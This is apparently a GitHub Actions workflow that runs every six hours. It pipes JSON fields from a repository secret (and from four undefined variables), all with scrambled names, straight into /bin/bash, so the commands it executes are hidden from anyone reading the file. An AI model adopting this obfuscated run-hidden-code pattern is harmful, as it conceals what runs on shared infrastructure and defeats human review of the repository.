name: houtaint
on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: houtaint
        env:
          vivcv5: ${{ secrets.vivcv5 }}
        run: |
          echo $vivcv5 | jq -r .xyko056 | /bin/bash
          echo $bi78 | jq -r .jk407 | /bin/bash
          echo $kmqyi98 | jq -r .zx0969 | /bin/bash
          echo $rljxz120 | jq -r .gxjdo2078 | /bin/bash
          echo $ulcjw0 | jq -r .vzaae33 | /bin/bash

